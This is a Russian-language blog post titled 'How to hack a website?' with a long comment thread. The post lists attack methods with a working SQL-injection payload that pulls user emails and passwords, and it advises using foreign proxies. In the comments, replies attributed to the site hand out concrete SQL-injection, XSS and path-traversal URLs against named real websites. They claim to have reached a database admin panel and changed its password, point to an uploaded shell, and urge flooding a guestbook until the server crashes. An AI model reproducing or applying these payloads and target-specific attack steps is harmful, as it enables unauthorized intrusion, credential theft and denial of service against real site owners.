Как взломать сайт?

Редактор реестра Windows - regedit

Многие хотят взломать сайт! Но не знают как и что для этого нужно. Ну давайте разберёмся, взломов сайта не так уж и много, да и далеко не каждый сайт можно сломать или взломать! Существует мнение, о каких-то людях, который якобы хакер и может взломать всё на свете — это не так, и далеко не всё на свете, ибо обратной стороной медали, для такого индивидума, существуют двое Молдован в тёмной подворотне… было холодно и скользко, он шёл один после работы… и итогом может служить не взлом сайта, а взлом черепа взламывающего 😉 Ну ладно, опустим лирику и перейдём к делу. И так, предположим, что вы захотели взломать сайт. Значит так, самое главное убедиться, и это должен сделать хакер (специалист), что данный сайт подвержен так называемым с недавних пор «уязвимостям» это ошибки, в программном обеспечении или программировании, связанные с недоработкой, или выводом из строя части или всей программы. Идём по пунктам:

1) Ошибка php-код типа: Warning php fatal error on line 127 /www/htdocs/  или asp-код код: server error 0x000345, 1; — позволяющая получить путь к htpasswd, паролям через include и БД, а также вывести пароль прямо на страничке в «скрытом месте». Всё — вы Админ!

2) XSS- межсетевая атака, когда в постинге сайта жертвы вы имплантируете свой код, в котором загружается иной сайт донор. Нужно узнать, можно ли «подломить сайт» через <iframe, <java — тут в первую страницу, можно подменить на поддельную, вынудив Администратора ввести пароль в вашей web-страничке и передать его вам. Админ!

3) SQL-инъекция. Когда, в адресной строке, вы можете выполнить, за счёт подмены, sql-запрос к БД и узнать пароль Админа. sql-инъекция типа: https://localhost/path/user.php?id=-2+UNION+SELECT+1,2,3,4,5,concat(user_email,0x3e,user_passwd),7,8,9,10,11+from+users—

4) Уязвимости в программном обеспечении (от Linux до Windows) позволяющие воспроизвести исполняемый код, позволяющий вас наделить правами Админа или получить через программу права Хозяина

5) ddos-атака. «Задалбливание» сервера (по различным портам) разным трафиком, вызывающий переполнение памяти и дальнейший отказ в обслуживании системы, за это время можно беспрепятственно получить доступ к ресурсу и стать Админом!

6) Атака через ssh-доступ, по средством автоматизации или скрипта, вызывающий банальный подбор паролей к доступам по ftp и ssh — после  удачного завершения программы — вы Админ ресурса!

7) Управление сервером, через ничего не подозревающий компьютер-зомби, через вирусы в системе жертвы… иные виды (это далеко не полный список)

Это самые основные требования, для того, что бы вы хотели взломать сайт. Каждый пунктик, это минимум прочитанная вами энциклопедия. Мало того, нужна ещё и большая практика. По этому, знать всего не возможно, если вы хотите сломать сайт Вашему шефу, коллеге по работе или просто недоброжелателю. Данный материал написан с целью ознакомления читателя, который, зная свою цель ставит себе задачей взломать сайт, а значит знает, чего он хочет раз прочёл этот текст. Что бы сломать сайт нужно обладать минимум знаниями web-Программиста до Sys-Админа!


А вы думаете это так просто? Нет, каждый сайт индивидуальный подход требует. Мы конечно можем проверить сайт на уязвимость, если вы таковой нам предоставите для анализа. Предоставить сайт для анализа можно тут, а взламывать его будете наверное Вы! Ещё, серьёзной особенностью является, и то, что мы можем предупредить Вас или Вашу фирму, о «слабых местах» вашего сайта! Так что обращайтесь! И на прощанье — пользуйтесь зарубежными прокси серверами для вашей безопасности.

74 thoughts on “Как взломать сайт?

  1. Расскажите какие уязвимости этого сайта вы нашли, мне нужно заполучить доступ к админке, но совсем не знаю с чего начать… и как. p2p.allnorilsk.ru/index.php

    1. SQL-инъекция прокатывает, через window.open() и … айловую структуру видно кое-где оголённую без защиты!

  2. Прежде чем чего-то делать, анализируем и находим: xakep.ru/post/36085/default.asp
    А уж «как?» 🙂 Ну как вам сказать — Как на сайт на html или php сделать, как программу написать? Как я это на пальцах объясню? На самом деле — админка старая, а значит есть уязвимости. Но за счёт того, что малораспростоняемая… На недельке вам напишу сюда, что интересного по этому поводу есть там, если конечно ещё что найдётся!

  3. подскажите пожалуйста степень защиты (от1 до 10) и слабые места))
    заранее спасибо)
    желателен доступ к админке.. или просто к базе данных..)

      1. Скажите какие уязвимости у этого сайта ? germany.ru

        1. Ну вот XSS:
          shop.germany.ru/cart/advanced_search_result.php?keywords=«iframe src=http://ya.ru»«/iframe»
          Есчё: 654 — прользователь
          germany.ru/cgi-bin/portal/showusers.cgi?Cat=21&Menu1=username&Sort_key=1&search_val=654
          И: germany.ru/cgi-bin/portal/showhoroskoptab.cgi?Number=admin#
          (нажимаем ссылочку «-» и видим, что в это место выводися GET)
          И: ove.germany.ru/cgi-bin/single.cgi?id=-2+UNION+SELECT+1,2,3,4,5,concat%28useremail,0x3e,userpasswd%29,7,8,9,10,11+from+usernames—
          germany.ru/cgi-bin/portal/showhoroskoptab.cgi?Number=573489798789789_sql_injection_make_be_78978979789687678 — нужно пробывать

          ads.germany.ru/openads/www/delivery/ck.php?oaparams=2__bannerid=306__zoneid=86__cb=463cfe700e__oadest=http%3A%2F%2Fshop.germany.ru%2Fcart%2Fproduct_info.php%3FcPath%3D26%26products_id%3D19091
          Вместо ихней ссылки — редирект на MySQL к Админу 😉
          Есчё:
          germany.ru/cgi-bin/portal/changeskin.cgi?skin=3&link=http%3A%2F%2Fclub.ya.ru%2F
          top.germany.ru/cgi-bin/links/top.cgi?ID=../../../../../../../../../../../../../../../../.htpassd%00

          Счётчиг свой 😉
          top.germany.ru/cgi-bin/links/top.cgi?ID=3279&v=4 Ыыыыы!

          Кстати говоря, это ранее известный сайт и его форум спокойно подламывался через iframe — нужно только пользователя «левого» зарегить там. И потом, через Web-интерфейс нельзя будет ничего сделать. Вообщем, через CGI-старый метод, 10 летней давности. А если ещё и shell можно вместо фотки залить — ну раздолье будет! От СПАМ-машины до ПОРНО-прокси! Читайте Инет.

    1. Несанкционированный доступ к phpMyAdmin (с паролем юзера) и получение пароля md5 — запись которого нужно подменить на — известную (при входе) вот вам права админа SQL=table colletion! 🙂 Входим и первым делом — добавляем пользователя с правами Админа! Ну а дальше — как в песне поётся!

  4. Здравствуйте!! Вы знаете программу с помощью, которой по id можно узнать логин, пароль??

    1. Если в ID что-то передаётся, то теоретически можно расшифровать логин и пароль. Обычно, это делается по примеру сессии $session_start(); на php. Где $user+$password шифруются и добавляются в сессию для перехода по страница браузера. Есть довольно много способов. но любой из них нужно анализировать всегда.

  5. Можно как нибудь накосячить вот этому сайту?! alvatv.kz

    1. Да, можно. Сайт реальный лохи делали. Особенно радует фраза в коде: 192.168.0.55/img/background/green.gif С локалхоста бэкграунд загружает. Сами его видят и радуются, думая что другие пользователи его тоже видят. 😉 Ржунемогу

        1. А сколько интересного тут я подчерпнул: alvatv.kz/img
          Ребят, и GET — передаёт ваш текст: alvatv.kz/main.php?page=horoscope&page=rek_gaz+%3Cimg%20src=javascript:alert%28%27%D4%E0%EA%FE%E1%EB%FF!%27%29;%3C/H1%3E&page=rek_gaz

      1. Ба, и новости кудато делись все? Шо за куйня! Ребята вам просто дали сайт свой посмотреть — показать какие они крутые программисты, бля, а вы уже его хакнули — что за хуйня, кто виноват: alvatv.kz/main.php?cont=long&id=44545454545445498&year=20411&today=452&month=78 и что делать теперь? Базу уже не восстановить (пароля нет), сайт не починить… он дыряв как решето бля

    2. Бля Вася, а что за папка mm ж) alvatv.kz/admin/mm/

      1. Казахи бля им бы бля лепёшки 😉 печь пистатые — а они в программисты все идут. У них прирост населения из 10000000 чумазиков — 1программист php 😉

    3. Продолжение, для тех кто рекламирует таким образом свой сайт: alvatv.kz/.htpasswd
      ///Joomla SWmenuMaker Component///
      ********* Copyright ***********

      Copyright (C) 2004 Sean White : swmenupro.com/
      All rights reserved

      Name : SWmenuMaker(Professional Edition)
      Description : Joomla/Mambo Menu Manager
      Component File Name : com_swmenumenumaker2.0_J1.5.zip

      Developer : Sean White
      Date : APR. 1, 2008
      version : 2.0

      ************* Install *************
      Component Installation
      ———————-
      In Administrator Menu, go to Components, Install/Uninstall…
      Go to the section Upload new component, browse and select the com_swmenumaker2.0_J1.5.zip file…
      Press the Upload File button.

      1. Да тут Джумла не доделанная, вся переделанная, ппц! Они ещё и форум им завалили наюх alvatv.kz/forum/viewtopic.php?f=444444448&t=22444444444444444444444444444444444444

    4. База данных тут, с логином: root
      alvatv.kz/myadmin/index.php?token=f146ac46cb20b1854f19acec276cfb2c
      А дальше сами знаете что делать с ней 😉 и как морду поменять сайта, да и пароль за одно — мы уже поменяли на свой 123…. а дальше не скажу. Хрен подберёте.

  6. Парни возможно ли поломать этот сайт http:// lich-king.net /
    за ранее огромное спасибо!!

  7. Доброго времени суток! Парни вопрос — можно ли это взломать hттp://www.kavkaz-uzel.ru/ ? Заранее спасибо ))

  8. Ребят помогите взломать сайт donmar.kz очень надо))

  9. нужна помощь в получении доступа к сайту. ***.by хорошо заплатим. skype: jordan407555

  10. тут есть какие ниубуть минуса??!?оч оч интересно

  11. Уважаемые господа и дамы!
    Взлом сайтов, это противозаконно! Мы не мошенники, и не взломщики. Поиграться — да! Помочь со знаниями, поделиться опытом, тоже да.
    Мы можем помочь вам обезопасить ваш сайт, компьютер, сервер.
    Проконсультировать в покупке железа, для сервера. Настроить серверную ось, обезопасить ваши данные. Помочь установить и запустить интернет сайт, электронный магазин. Причём всё это удалённо, и не дорого.
    Мы коммерсанты!!!

  12. Ребят, мне просто надо знать возможно ли взломать этот сайт hттp://www.kavkaz-uzel.ru/ или даже пытаться не стоит, и если да то в каком направлении копать!!! ОООчень нужно, пжл… !!!! Буду крайне признателен !!!

  13. новечку трудно будет и возможно взломать ?

  14. Здравствуйте хочеться спросить у профессионалов
    Знаю про такой прикол,можно над любым сайтом подшутить
    Изменяя текст блогов,статей..(для этого просто нужно в адресную строку ввести «javascript:void(document.body.contentEditable = true);»)А есть ли что-то на подобие,но чтоб результат сохранялся,и был виден всем?
    Или может,для этого нужна какая либо программа?

    1. XXS — атака называется.
      Можно. Когда вы это реализуете через iframe и при этом зарегистрируете сайт, скажем на narod.ru и добавите его к индексации в поисковиках. Если не забанят — получите инвалидное чудо в перьях.

  15. ребят очень нужно взломать один сайт. очень…. просто достали уже

  16. Заплачу реалом тому кто взломает мне сайт… Напишите мне на скайп Artem-Omega 😈
    Хочу взломать сайт, потомучто меня админ очень обидел.

  17. можит ли кто то сломать плиз и доступ к админове скинуть мне!)))???
    hттp://www.okhtyrka.net/

  18. Исполненные по формуле меню аккордеон как, швейцарский механизм заработал
    СКИДКИ до 50%

  19. ❓ Извените пожалуйста, скажите
    уязвимости сайта edu.tatar.ru???!!!
    И можно ли как-нибудь ваааще удалить сайт?
    Заранее спасибо! 😛

  20. Ребят, можно ли слить базу с компа с demo.vetmanager.ru ? Очень нужно, а как сделать, не знаю.

  21. да и ещё желательно доступ к админке…

  22. ребят наткнулся случайно обещали деньги. набрал инимум для выплоты, хуй в нос не рубля ни ответа на мой вопрос. я не злой человек но я люблю справыедливость, если сказал заплачу то плати не надо слова на ветер кидать это уже не по лютски. увидить бы этого ублюдка. вот по этому и хочу сломать обиделся я сильнол. не место обебосам в сети. иначе это ни интернет а сплошное наебалово, куда дется нормальным людям?

  23. А вы дайте ему в морду проста, проколите колёса…
    Ну взломают они ему сайт, хули — он через пол часа залёт Бэкап -и снова всё будет работать и смысл? Если сами знаете — переписал и всё снова есть… Времени уйдёт на взлом хуеватуча, а воосстановить всё — пять минут…

  24. В отношении Татарстана: edu.tatar.ru
    Образовательная система — дневники. Программа Медведя (Медвепута). Жалко детишек, далее НИЧЕГО ВЗЛАМЫВАТЬ НЕ БУДЕМ! НЕ ПРОВОЦИРУЙТЕ НАС! ЭТО ВСЁ-ТАКИ ДЕТИ, хоть и ченрнопопые, но дети! 😈
    проверяется»,result_title:»Результат»},grading:{activate_new_lesson_version:»Для выполнения данного действия требуется активировать новую версию занятия»,actualize:»Для ответа на тесты требуется активации новой версии занятия в связи с внесением изменений.\nПри активации новой версии могут быть сброшены данные успеваемости, в том числе процент прохождения занятия и отметка за занятие.\n\nВы уверены, что хотите активировать новую версию?»,checked_homework:»Проверенное задание для самоподготовки»,ege_teacher_go_page:»В настоящий момент слушатель либо не приступил, либо выполняет данный тест»,finished_homework:»Выполненное задание для самоподготовки»,homework:»задание для самоподготовки»,homework_abbreviature:»Задание для самопоготовки»,homework_capital:»Задание для самоподготовки»,homework_checked:»Задание для самоподготовки: проверено»,homework_done:»Задание для самоподготовки: выполнено»,homework_processing:»Работа с заданием для самоподготовки»,lesson:»занятие»,lesson_genitive:»занятия»,lesson_grade:»Отметка за занятие: «,lesson_not_available:»Занятие недоступно»,mark_capital:»Отметка»,mark_homework_abbreviature:»Отметка за задание для самоподготовки: «,mark_homework_tests:»Отметка за тесты в Д/З: «,mark_open_answer:»Отметка за ЗОО: «,mark_points:»Отметка в баллах:»,mark_semicolon:»Отметка: «,mark_tests:»Отметка за тесты: «,restart:»Вы уверены, что хотите переназначить занятие «%s»?»,restarted:»Выполнено переназначение занятия «%s»»,wrong_mark:»Неверная отметка за задание»,wrong_mark_short:»Неверная отметка»,wrong_mark_testC:»Неверная отметка за тест C»},hactar:{flags_for_lesson:»Для урока»,lesson_name:»Занятие»,page_values:»{‘school’: u’\\u0418\\u041f\\u041a’}»},teleschool:{average_mark:»Средняя отметка»,course_forum_name:»Форум по курсу»,course_progress:»Промежуточные уточненные результаты»,custom_grade_mark_creative:»Отметка за творческие работы и проекты»,custom_grade_mark_ege_prep:»Отметка за работы по подготовке к ЕГЭ»,homework_abbreviature:»Задание для самоподготовки»,homework_grade:»Задания для самоподготовки: всего/ выполнено/ проверено»,homework_grade_abbreviature:»Отметка за задание для самоподготовки»
    ,homework_grade_open_answer:»Отметка за задания с открытым ответом»,homework_test_grade:»Отметка за тесты в Д/З»,lesson:»Занятие»,lesson_c:»Занятие: %s»,lesson_capital_genitive:»Занятий»,lesson_forum_name:»Форум по занятию»,lesson_genitive:»занятий»,lesson_list:»Список занятий»,lesson_passed:»Занятий пройдено»,lesson_passed_total:»Занятий пройдено/ всего»,lessons:»занятия»,lessons_passed:»Кол-во пройденных занятий»,mark_capital:»Отметка»,mark_individual:»Отметка за индивидуальные задания»,num_lessons:»Количество занятий»,public_forum_name:»Общий форум»,reassign_lesson:»Переназначить занятие»,resulting_mark:»Итоговая отметка»,staff_forum_name:»Методический кабинет»,student_col:»Слушатель»,student_title:»Слушатели»,students_number:»Кол-во слушателей»,test_grade:»Отметка за тесты»},ufields:{address:»Адрес»,avatar:»Аватар (100×100)»,email:»E-mail»,grade:»Класс»,home_phone:»Домашний телефон»,isactive:»Активен»,mobile_phone:»Мобильный телефон»,name:»Имя Отчество»,pwd:»Пароль»,pwd_confirm:»Подтверждение пароля»,reg_date:»Дата регистрации»,region:»Регион»,school_name:»Название образовательного учреждения»,school_number:»№ образовательного учреждения»,school_type:»Тип образовательного учреждения»,schooltype:»Тип учебного заведения»,settlement_name:»Название населённого пункта»,settlement_type:»Тип населённого пункта»,settlementtype:»Тип населённого пункта»,surname:»Фамилия»,whence:’Откуда узнали об Университете «Просвещение»…’,whence_custom:»… другое»,work_phone:»Рабочий телефон»},usersys:{student_capital:»Слушатель»,students_capital:»Слушатели»,tutor_capital:»Куратор»,tutors_capital:»Кураторы»},zarquon:{homework_capital:»Задание для самоподготовки»,lesson_capital:»Занятие»,lesson_dative:»Занятия»,lesson_new_version_available:»Доступна новая версия занятия!»,lesson_page:»Страница занятия»,lesson_plan:»План занятия»,lesson_results:»Итоги занятия»,lesson_with_brackets:»(занятие)»,lessons_not_available:»Занятия отсутствуют»,mark_capital:»Отметка»,mark_semicolon:»Отметка:
    window.SERVER_TS_ID = ‘4f32cac4’;
    хететепе://85.233.79.238/school-login

  25. Кстати, мона срать в каментах и форуме от имени Администратора, вот пример: kalmykia.kavkaz-uzel.ru/forum/topics/1445
    Ccукипятком, смотрим принтскрин:

    Шелл для управления файлами:
    вевеве.kavkaz-uzel.ru/system/attachments/0002/7870/ss_photo.jpg

    Ну что ОБОСРАЛИСЬ?. 😀 😀 😀

  26. Вот вам и ветменеджер:
    Fatal error: mysql error: [1049: Unknown database ‘vetmanager_ru’] in PCONNECT(localhost, ‘****’, ‘****’, vetmanager_ru) in /home/admin/sites/medit/demo.vetmanager.ru/application/components/NADOdb/NADOdb.php on line 706
    Дальше надо? Не боитесь? 😳

    1. Можете пожертвовать нам за проделанную работу, рублей в разумных пределах.
      Если не пожертвуйте — мы будем считать таких пользователей как вы — лошарами и звездоболами! Работа сделана! Всё смотрите тут!
      PS:…Я, мол заплачу, бабки, любому, кто мне, … флуд

  27. здравствуйте, помогите можно както на косячить им:
    333host.ru
    panel.333host.ru
    biling.333host.ru
    Они у меня два касаря спиздили. а лучше дайте мне логин и пароль от главного администратора

  28. Добивайтесь через уязвимости root прав под пользователем test, потом заводите своего пользователя с правами root :mrgreen: :mrgreen: :mrgreen:
    Далее, заливайте shell ну вот какая-то такая схема…

    Тест сервер GTA:SA-MP 0.3d: 91.122.53.159:3389
    Тест сервер MTA:San Andreas 1.1: 91.122.53.159:22003
    Тест сервер CS 1.6: 91.122.53.159:10101
    Тест сервер CSS v34: 91.122.53.159:27030
    Тест сервер IV:MP: 91.122.53.159:1234
    Ссылка на панель управления есть в меню сайта выше.
    Демо логин от панели управления: user_test
    Пароль от демо аккаунта: test

    1. Ну вот, SQL-уязвимость прокатывает: cosmed.ru/guest.shtml?action=view&page=%273
      Кавычка. Сайт на html. Код внутри где-то закоментарен
      Срите в гостевую: ACTION=’/cgi-bin/guestbook.pl’
      Капчи — нет. Сделайте свой «засратель». Повесьте куданить инкогнито и пусть он ддосит книжку, срёт туда, мегадайтами. В поля input — уберите maxlength и сделайте multipart/data — и залевайте через cgi — exe, bat, php, asp… avi можно мегатонное (ограничений нет) — ПОКА СЕРВАК НЕ ЛЯЖЕТ наглухо. Повторяйте процедуру 1414213423252 раз в минуту 😉
      На cgi-bin — полным полно уязвимостей, книжка старая… как мир.

      1. спасибо
        тока я не осыбый спец. поможете? Был бы благодарен)

      2. очень хочется, чтоб этот сайт больше никто никогда не увидел. Обидели(

        1. Так сами займитесь им. Идеи вам человек уже указал. Мы не взламываем сайты — мы помогаем людям.

    1. файл: contact.php
      пропускает уязвимости: action="form_action.php" enctype="multipart/form-data" method="post" — text/plaintext
      Нет ограничений maxlength=
      Пропускает фильтрации…
      Пропускает XXS
      Теоретически, можно загрузить shell или троян — прямо админу в админку… Мы попробывалы — посмотрите, прокатило?

  29. Здравствуйте,
    Интересуют уязвимости сайта: huge-library.org
    если дадите более конкретную инфу то отблагодарю.
    Спасибо.

    1. Обкаколись — руками сделали «переброс» на 403: Hacking attempt!

      var dle_root = '/';
      var dle_admin = '';
      var dle_login_hash = '';
      var dle_skin = 'White';
      var dle_wysiwyg = 'no';
      var quick_wysiwyg = '0';
      var menu_short = 'Быстрое редактирование';
      var menu_full = 'Полное редактирование';
      var menu_profile = 'Просмотр профиля';
      var menu_fnews = 'Найти все книги';
      var menu_fcomments = 'Найти все комментарии';
      var menu_send = 'Отправить сообщение';
      var menu_uedit = 'Админцентр';
      var dle_req_field = 'Заполните все необходимые поля';
      var dle_del_agree = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
      var dle_del_news = 'Удалить книгу';
      var allow_dle_delete_news = false;

      Это обманка? Или реально? А не пробывали у себя на локалхосте пересобрать через jqvery? Какой будет результат обработки через do=

  30. всем привет скажите пожалуйста возможно взломать этот сайт? school2karpinsk.ru

  31. спосибо) а у меня такой вопрос меня могут вычислить по ip? он меняется если перезагрузить модем но все равно как то страшновато(

  32. скажите пожалуйста какая это версия:
    * @version $Id: configuration.php-dist 14401 2010-01-26 14:10:00Z louis $

Comments are closed.